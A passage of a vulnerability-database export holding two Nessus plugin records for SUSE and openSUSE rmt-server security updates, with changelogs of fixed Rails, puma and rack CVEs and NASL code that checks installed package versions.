:\n\n - systemd ordering was missing\n\n - shadow is required for pre-install\n\nVersion 2.5.9\n\nrmt-server-pubcloud: enforce strict authentication\n\nVersion 2.5.8\n\nUse repomd_parser gem to remove repository metadata parsing code.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLES15 Security Update : rmt-server (SUSE-SU-2020:3160-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16770", "CVE-2019-5418", "CVE-2019-5419", "CVE-2019-5420", "CVE-2020-11076", "CVE-2020-11077", "CVE-2020-15169", "CVE-2020-5247", "CVE-2020-5249", "CVE-2020-5267", "CVE-2020-8164", "CVE-2020-8165", "CVE-2020-8166", "CVE-2020-8167", "CVE-2020-8184", "CVE-2020-8185"], "modified": "2020-12-17T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:rmt-server", "p-cpe:/a:novell:suse_linux:rmt-server-config", "p-cpe:/a:novell:suse_linux:rmt-server-debuginfo", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-3160-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143623", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:3160-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143623);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/17\");\n\n script_cve_id(\"CVE-2019-16770\", \"CVE-2019-5418\", \"CVE-2019-5419\", \"CVE-2019-5420\", \"CVE-2020-11076\", \"CVE-2020-11077\", \"CVE-2020-15169\", \"CVE-2020-5247\", \"CVE-2020-5249\", \"CVE-2020-5267\", \"CVE-2020-8164\", \"CVE-2020-8165\", \"CVE-2020-8166\", \"CVE-2020-8167\", \"CVE-2020-8184\", \"CVE-2020-8185\");\n\n script_name(english:\"SUSE SLES15 Security Update : rmt-server (SUSE-SU-2020:3160-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for rmt-server fixes the following issues :\n\nVersion 2.6.5\n\nSolved potential bug of SCC repository URLs changing over time. RMT\nnow self heals by removing the previous invalid repository and\ncreating the correct one.\n\nVersion 2.6.4\n\nAdd web server settings to /etc/rmt.conf: Now it's possible to\nconfigure the minimum and maximum threads count as well the number of\nweb server workers to be booted through /etc/rmt.conf.\n\nVersion 2.6.3\n\nInstead of using an MD5 of URLs for custom repository friendly_ids,\nRMT now builds an ID from the name.\n\nVersion 2.6.2\n\nFix RMT file caching based on timestamps: Previously, RMT sent GET\nrequests with the header 'If-Modified-Since' to a repository server\nand if the response had a 304 (Not Modified), it would copy a file\nfrom the local cache instead of downloading. However, if the local\nfile timestamp accidentally changed to a date newer than the one on\nthe repository server, RMT would have an outdated file, which caused\nsome errors. Now, RMT makes HEAD requests to the repositories servers\nand inspect the 'Last-Modified' header to decide whether to download a\nfile or copy it from cache, by comparing the equalness of timestamps.\n\nVersion 2.6.1\n\nFixed an issue where relative paths supplied to `rmt-cli import repos`\ncaused the command to fail.\n\nVersion 2.6.0\n\nFriendlier IDs for custom repositories: In an effort to simplify the\nhandling of SCC and custom repositories, RMT now has friendly IDs. For\nSCC repositories, it's the same SCC ID as before. For custom\nrepositories, it can either be user provided or RMT generated (MD5 of\nthe provided URL). Benefits :\n\n - `rmt-cli mirror repositories` now works for custom\n repositories.\n\n - Custom repository IDs can be the same across RMT\n instances.\n\n - No more confusing 'SCC ID' vs 'ID' in `rmt-cli` output.\n Deprecation Warnings :\n\n - RMT now uses a different ID for custom repositories than\n before. RMT still supports that old ID, but it's\n recommended to start using the new ID to ensure future\n compatibility.\n\nVersion 2.5.20\n\nUpdated rails from 6.0.3.2 to 6.0.3.3 :\n\n - actionview (CVE-2020-15169)\n\nVersion 2.5.19\n\nRMT now has the ability to remove local systems with the command\n`rmt-cli systems remove`.\n\nVersion 2.5.18\n\nFixed exit code for `rmt-cli mirror` and its subcommands. Now it exits\nwith 1 whenever an error occurs during mirroring\n\nImproved message logging for `rtm-cli mirror`. Instead of logging an\nerror when it occurs, the command summarize all errors at the end of\nexecution. Now log messages have colors to better identify\nfailure/success.\n\nVersion 2.5.17\n\nRMT no longer provides the installer updates repository to systems via\nits zypper service. This repository is used during the installation\nprocess, as it provides an up-to-date installation experience, but it\nhas no use on an already installed system.\n\nVersion 2.5.16\n\nUpdated RMT's rails and puma dependencies.\n\n - puma (CVE-2020-11076, CVE-2020-11077, CVE-2020-5249,\n CVE-2020-5247 CVE-2019-16770)\n\n - actionpack (CVE-2020-8185, CVE-2020-8164, CVE-2020-8166)\n\n - actionview (CVE-2020-8167, CVE-2020-5267, CVE-2019-5418,\n CVE-2019-5419)\n\n - activesupport (CVE-2020-8165)\n\n - railties (CVE-2019-5420)\n\nVersion 2.5.15\n\nRMT now checks if repositories are fully mirrored during the\nactivation process. Previously, RMT only checked if the repositories\nwere enabled to be mirrored, but not that they were actually mirrored.\nIn this case, RMTs were not able to provide the repository data which\nsystems assumed it had.\n\nVersion 2.5.14\n\nEnable 'Installer-Updates' repositories by default\n\nFixed deprecation warning when thor encountered an error. Also,\ninstead of returning 0 for thor errors, rmt-cli will return 1 instead.\n\nVersion 2.5.13\n\nAdded `rmt-cli repos clean` command to remove locally mirrored files\nof repositories which are not marked to be mirrored.\n\nPreviously, RMT didn't track deduplicated files in its database. Now,\nto accommodate `rmt-cli repos clean`, RMT will track all mirrored\nfiles.\n\nMove the nginx reload to the configuration package which contain nginx\nconfig files, don't reload nginx unconditionally from main package.\n\nVersion 2.5.12\n\nUpdate rack to version 2.2.3 (CVE-2020-8184: bsc#1173351)\n\nUpdate Rails to version 5.2.4.3 :\n\n - actionpack (CVE-2020-8164: bsc#1172177)\n\n - actionpack (CVE-2020-8166: bsc#1172182)\n\n - activesupport (CVE-2020-8165: bsc#1172186)\n\n - actionview (CVE-2020-8167: bsc#1172184)\n\nVersion 2.5.11\n\nrmt-server-pubcloud :\n\n - SLES11 EOL\n\n - Extension activation verification based on the available\n subscriptions\n\n - Added a manual instance verification script\n\nVersion 2.5.10\n\nSupport rmt-server to run with Ruby 2.7 (Factory/Tumbleweed) :\n\n - Bump gem 'config' version from 1.7.2 to 2.2.1 to fix\n incompatibility Ruby 2.7 OpenStruct class;\n\n - Bump gem 'typhoeus' version from 1.3.1 to 1.4.0 in order\n to also bump gem 'ethon' version, which caused a\n 'rb_safe_level' warning on Ruby 2.7;\n\n - Fix 'last arg as keyword arg' Ruby 2.7 warning on source\n code;\n\n - Disable 'deprecated' warnings from Ruby 2.7; Rails 5.1\n generates a lot of warnings with Ruby 2.7, mainly due to\n 'capturing the given block with Proc.new', which is\n deprecated;\n\n - Improve RPM spec to consider only the distribution\n default Ruby version configured in OBS;\n\n - Improve RPM spec to remove Ruby 2.7 warnings regarding\n 'bundler.\n\nMove nginx/vhosts.d directory to correct sub-package. They are needed\ntogether with nginx, not rmt-server.\n\nFix dependencies especially for containerized usage :\n\n - mariadb and nginx are not hard requires, could run on\n another host\n\nFix generic dependencies :\n\n - systemd ordering was missing\n\n - shadow is required for pre-install\n\nVersion 2.5.9\n\nrmt-server-pubcloud: enforce strict authentication\n\nVersion 2.5.8\n\nUse repomd_parser gem to remove repository metadata parsing code.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172177\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172184\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1173351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-16770/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-5418/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-5419/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-5420/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-11076/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-11077/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-15169/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-5247/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-5249/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-5267/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-8164/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-8165/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-8166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-8167/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-8184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-8185/\"\n );\n # https://www.suse.com/support/update/announcement/2020/suse-su-20203160-1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e5e6b911\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Server Applications 15-SP1 :\n\nzypper in -t patch\nSUSE-SLE-Module-Server-Applications-15-SP1-2020-3160=1\n\nSUSE Linux Enterprise Module for Public Cloud 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Module-Public-Cloud-15-SP1-2020-3160=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8165\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Rails File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby On Rails DoubleTap Development Mode secret_key_base Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:rmt-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:rmt-server-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:rmt-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"rmt-server-2.6.5-3.18.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"rmt-server-config-2.6.5-3.18.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"rmt-server-debuginfo-2.6.5-3.18.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rmt-server\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:24:47", "description": "This update for rmt-server fixes the following issues :\n\n - Version 2.6.5\n\n - Solved potential bug of SCC repository URLs changing over time. RMT now self heals by removing the previous invalid repository and creating the correct one.\n\n - Version 2.6.4\n\n - Add web server settings to /etc/rmt.conf: Now it's possible to configure the minimum and maximum threads count as well the number of web server workers to be booted through /etc/rmt.conf.\n\n - Version 2.6.3\n\n - Instead of using an MD5 of URLs for custom repository friendly_ids, RMT now builds an ID from the name.\n\n - Version 2.6.2\n\n - Fix RMT file caching based on timestamps: Previously, RMT sent GET requests with the header 'If-Modified-Since' to a repository server and if the response had a 304 (Not Modified), it would copy a file from the local cache instead of downloading. However, if the local file timestamp accidentally changed to a date newer than the one on the repository server, RMT would have an outdated file, which caused some errors. Now, RMT makes HEAD requests to the repositories servers and inspect the 'Last-Modified' header to decide whether to download a file or copy it from cache, by comparing the equalness of timestamps.\n\n\n\n - Version 2.6.1\n\n - Fixed an issue where relative paths supplied to `rmt-cli import repos` caused the command to fail.\n\n - Version 2.6.0\n\n - Friendlier IDs for custom repositories: In an effort to simplify the handling of SCC and custom repositories, RMT now has friendly IDs. For SCC repositories, it's the same SCC ID as before. For custom repositories, it can either be user provided or RMT generated (MD5 of the provided URL). Benefits :\n\n - `rmt-cli mirror repositories` now works for custom repositories.\n\n - Custom repository IDs can be the same across RMT instances.\n\n - No more confusing 'SCC ID' vs 'ID' in `rmt-cli` output.\n Deprecation Warnings :\n\n - RMT now uses a different ID for custom repositories than before. RMT still supports that old ID, but it's recommended to start using the new ID to ensure future compatibility.\n\n - Version 2.5.20\n\n - Updated rails from 6.0.3.2 to 6.0.3.3 :\n\n - actionview (CVE-2020-15169)\n\n - Version 2.5.19\n\n - RMT now has the ability to remove local systems with the command `rmt-cli systems remove`.\n\n - Version 2.5.18\n\n - Fixed exit code for `rmt-cli mirror` and its subcommands. Now it exits with 1 whenever an error occurs during mirroring\n\n - Improved message logging for `rtm-cli mirror`. Instead of logging an error when it occurs, the command summarize all errors at the end of execution. Now log messages have colors to better identify failure/success.\n\n - Version 2.5.17\n\n - RMT no longer provides the installer updates repository to systems via its zypper service. This repository is used during the installation process, as it provides an up-to-date installation experience, but it has no use on an already installed system.\n\n - Version 2.5.16\n\n - Updated RMT's rails and puma dependencies.\n\n - puma (CVE-2020-11076, CVE-2020-11077, CVE-2020-5249, CVE-2020-5247 CVE-2019-16770)\n\n - actionpack (CVE-2020-8185, CVE-2020-8164, CVE-2020-8166)\n\n - actionview (CVE-2020-8167, CVE-2020-5267, CVE-2019-5418, CVE-2019-5419)\n\n - activesupport (CVE-2020-8165)\n\n - railties (CVE-2019-5420)\n\n - Version 2.5.15\n\n - RMT now checks if repositories are fully mirrored during the activation process. Previously, RMT only checked if the repositories were enabled to be mirrored, but not that they were actually mirrored. In this case, RMTs were not able to provide the repository data which systems assumed it had.\n\n - Version 2.5.14\n\n - Enable 'Installer-Updates' repositories by default\n\n - Fixed deprecation warning when thor encountered an error. Also, instead of returning 0 for thor errors, rmt-cli will return 1 instead.\n\n - Version 2.5.13\n\n - Added `rmt-cli repos clean` command to remove locally mirrored files of repositories which are not marked to be mirrored.\n\n - Previously, RMT didn't track deduplicated files in its database. Now, to accommodate `rmt-cli repos clean`, RMT will track all mirrored files.\n\n - Move the nginx reload to the configuration package which contain nginx config files, don't reload nginx unconditionally from main package.\n\n - Version 2.5.12\n\n - Update rack to version 2.2.3 (CVE-2020-8184:\n bsc#1173351)\n\n - Update Rails to version 5.2.4.3 :\n\n - actionpack (CVE-2020-8164: bsc#1172177)\n\n - actionpack (CVE-2020-8166: bsc#1172182)\n\n - activesupport (CVE-2020-8165: bsc#1172186)\n\n - actionview (CVE-2020-8167: bsc#1172184)\n\n - Version 2.5.11\n\n - rmt-server-pubcloud :\n\n - SLES11 EOL\n\n - Extension activation verification based on the available subscriptions\n\n - Added a manual instance verification script\n\n - Version 2.5.10\n\n - Support rmt-server to run with Ruby 2.7 (Factory/Tumbleweed) :\n\n - Bump gem 'config' version from 1.7.2 to 2.2.1 to fix incompatibility Ruby 2.7 OpenStruct class;\n\n - Bump gem 'typhoeus' version from 1.3.1 to 1.4.0 in order to also bump gem 'ethon' version, which caused a 'rb_safe_level' warning on Ruby 2.7;\n\n - Fix 'last arg as keyword arg' Ruby 2.7 warning on source code;\n\n - Disable 'deprecated' warnings from Ruby 2.7; Rails 5.1 generates a lot of warnings with Ruby 2.7, mainly due to 'capturing the given block with Proc.new', which is deprecated;\n\n - Improve RPM spec to consider only the distribution default Ruby version configured in OBS;\n\n - Improve RPM spec to remove Ruby 2.7 warnings regarding 'bundler.\n\n - Move nginx/vhosts.d directory to correct sub-package.\n They are needed together with nginx, not rmt-server.\n\n - Fix dependencies especially for containerized usage :\n\n - mariadb and nginx are not hard requires, could run on another host\n\n - Fix generic dependencies :\n\n - systemd ordering was missing\n\n - shadow is required for pre-install\n\n - Version 2.5.9\n\n - rmt-server-pubcloud: enforce strict authentication\n\n - Version 2.5.8\n\n - Use repomd_parser gem to remove repository metadata parsing code.\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update project.", "cvss3": {}, "published": "2020-11-24T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rmt-server (openSUSE-2020-2000)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16770", "CVE-2019-5418", "CVE-2019-5419", "CVE-2019-5420", "CVE-2020-11076", "CVE-2020-11077", "CVE-2020-15169", "CVE-2020-5247", "CVE-2020-5249", "CVE-2020-5267", "CVE-2020-8164", "CVE-2020-8165", "CVE-2020-8166", "CVE-2020-8167", "CVE-2020-8184", "CVE-2020-8185"], "modified": "2020-12-17T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:rmt-server", "p-cpe:/a:novell:opensuse:rmt-server-config", "p-cpe:/a:novell:opensuse:rmt-server-debuginfo", "p-cpe:/a:novell:opensuse:rmt-server-debugsource", "p-cpe:/a:novell:opensuse:rmt-server-pubcloud", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-2000.NASL", "href": "https://www.tenable.com/plugins/nessus/143225", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-2000.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143225);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/17\");\n\n script_cve_id(\"CVE-2019-16770\", \"CVE-2019-5418\", \"CVE-2019-5419\", \"CVE-2019-5420\", \"CVE-2020-11076\", \"CVE-2020-11077\", \"CVE-2020-15169\", \"CVE-2020-5247\", \"CVE-2020-5249\", \"CVE-2020-5267\", \"CVE-2020-8164\", \"CVE-2020-8165\", \"CVE-2020-8166\", \"CVE-2020-8167\", \"CVE-2020-8184\", \"CVE-2020-8185\");\n\n script_name(english:\"openSUSE Security Update : rmt-server (openSUSE-2020-2000)\");\n script_summary(english:\"Check for the openSUSE-2020-2000 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for rmt-server fixes the following issues :\n\n - Version 2.6.5\n\n - Solved potential bug of SCC repository URLs changing\n over time. RMT now self heals by removing the previous\n invalid repository and creating the correct one.\n\n - Version 2.6.4\n\n - Add web server settings to /etc/rmt.conf: Now it's\n possible to configure the minimum and maximum threads\n count as well the number of web server workers to be\n booted through /etc/rmt.conf.\n\n - Version 2.6.3\n\n - Instead of using an MD5 of URLs for custom repository\n friendly_ids, RMT now builds an ID from the name.\n\n - Version 2.6.2\n\n - Fix RMT file caching based on timestamps: Previously,\n RMT sent GET requests with the header\n 'If-Modified-Since' to a repository server and if the\n response had a 304 (Not Modified), it would copy a file\n from the local cache instead of downloading. However, if\n the local file timestamp accidentally changed to a date\n newer than the one on the repository server, RMT would\n have an outdated file, which caused some errors. Now,\n RMT makes HEAD requests to the repositories servers and\n inspect the 'Last-Modified' header to decide whether to\n download a file or copy it from cache, by comparing the\n equalness of timestamps.\n\n\n\n - Version 2.6.1\n\n - Fixed an issue where relative paths supplied to `rmt-cli\n import repos` caused the command to fail.\n\n - Version 2.6.0\n\n - Friendlier IDs for custom repositories: In an effort to\n simplify the handling of SCC and custom repositories,\n RMT now has friendly IDs. For SCC repositories, it's the\n same SCC ID as before. For custom repositories, it can\n either be user provided or RMT generated (MD5 of the\n provided URL). Benefits :\n\n - `rmt-cli mirror repositories` now works for custom\n repositories.\n\n - Custom repository IDs can be the same across RMT\n instances.\n\n - No more confusing 'SCC ID' vs 'ID' in `rmt-cli` output.\n Deprecation Warnings :\n\n - RMT now uses a different ID for custom repositories than\n before. RMT still supports that old ID, but it's\n recommended to start using the new ID to ensure future\n compatibility.\n\n - Version 2.5.20\n\n - Updated rails from 6.0.3.2 to 6.0.3.3 :\n\n - actionview (CVE-2020-15169)\n\n - Version 2.5.19\n\n - RMT now has the ability to remove local systems with the\n command `rmt-cli systems remove`.\n\n - Version 2.5.18\n\n - Fixed exit code for `rmt-cli mirror` and its\n subcommands. Now it exits with 1 whenever an error\n occurs during mirroring\n\n - Improved message logging for `rtm-cli mirror`. Instead\n of logging an error when it occurs, the command\n summarize all errors at the end of execution. Now log\n messages have colors to better identify failure/success.\n\n - Version 2.5.17\n\n - RMT no longer provides the installer updates repository\n to systems via its zypper service. This repository is\n used during the installation process, as it provides an\n up-to-date installation experience, but it has no use on\n an already installed system.\n\n - Version 2.5.16\n\n - Updated RMT's rails and puma dependencies.\n\n - puma (CVE-2020-11076, CVE-2020-11077, CVE-2020-5249,\n CVE-2020-5247 CVE-2019-16770)\n\n - actionpack (CVE-2020-8185, CVE-2020-8164, CVE-2020-8166)\n\n - actionview (CVE-2020-8167, CVE-2020-5267, CVE-2019-5418,\n CVE-2019-5419)\n\n - activesupport (CVE-2020-8165)\n\n - railties (CVE-2019-5420)\n\n - Version 2.5.15\n\n - RMT now checks if repositories are fully mirrored during\n the activation process. Previously, RMT only checked if\n the repositories were enabled to be mirrored, but not\n that they were actually mirrored. In this case, RMTs\n were not able to provide the repository data which\n systems assumed it had.\n\n - Version 2.5.14\n\n - Enable 'Installer-Updates' repositories by default\n\n - Fixed deprecation warning when thor encountered an\n error. Also, instead of returning 0 for thor errors,\n rmt-cli will return 1 instead.\n\n - Version 2.5.13\n\n - Added `rmt-cli repos clean` command to remove locally\n mirrored files of repositories which are not marked to\n be mirrored.\n\n - Previously, RMT didn't track deduplicated files in its\n database. Now, to accommodate `rmt-cli repos clean`, RMT\n will track all mirrored files.\n\n - Move the nginx reload to the configuration package which\n contain nginx config files, don't reload nginx\n unconditionally from main package.\n\n - Version 2.5.12\n\n - Update rack to version 2.2.3 (CVE-2020-8184:\n bsc#1173351)\n\n - Update Rails to version 5.2.4.3 :\n\n - actionpack (CVE-2020-8164: bsc#1172177)\n\n - actionpack (CVE-2020-8166: bsc#1172182)\n\n - activesupport (CVE-2020-8165: bsc#1172186)\n\n - actionview (CVE-2020-8167: bsc#1172184)\n\n - Version 2.5.11\n\n - rmt-server-pubcloud :\n\n - SLES11 EOL\n\n - Extension activation verification based on the available\n subscriptions\n\n - Added a manual instance verification script\n\n - Version 2.5.10\n\n - Support rmt-server to run with Ruby 2.7\n (Factory/Tumbleweed) :\n\n - Bump gem 'config' version from 1.7.2 to 2.2.1 to fix\n incompatibility Ruby 2.7 OpenStruct class;\n\n - Bump gem 'typhoeus' version from 1.3.1 to 1.4.0 in order\n to also bump gem 'ethon' version, which caused a\n 'rb_safe_level' warning on Ruby 2.7;\n\n - Fix 'last arg as keyword arg' Ruby 2.7 warning on source\n code;\n\n - Disable 'deprecated' warnings from Ruby 2.7; Rails 5.1\n generates a lot of warnings with Ruby 2.7, mainly due to\n 'capturing the given block with Proc.new', which is\n deprecated;\n\n - Improve RPM spec to consider only the distribution\n default Ruby version configured in OBS;\n\n - Improve RPM spec to remove Ruby 2.7 warnings regarding\n 'bundler.\n\n - Move nginx/vhosts.d directory to correct sub-package.\n They are needed together with nginx, not rmt-server.\n\n - Fix dependencies especially for containerized usage :\n\n - mariadb and nginx are not hard requires, could run on\n another host\n\n - Fix generic dependencies :\n\n - systemd ordering was missing\n\n - shadow is required for pre-install\n\n - Version 2.5.9\n\n - rmt-server-pubcloud: enforce strict authentication\n\n - Version 2.5.8\n\n - Use repomd_parser gem to remove repository metadata\n parsing code.\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172177\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172184\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1173351\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected rmt-server packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8165\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Rails File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby On Rails DoubleTap Development Mode secret_key_base Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 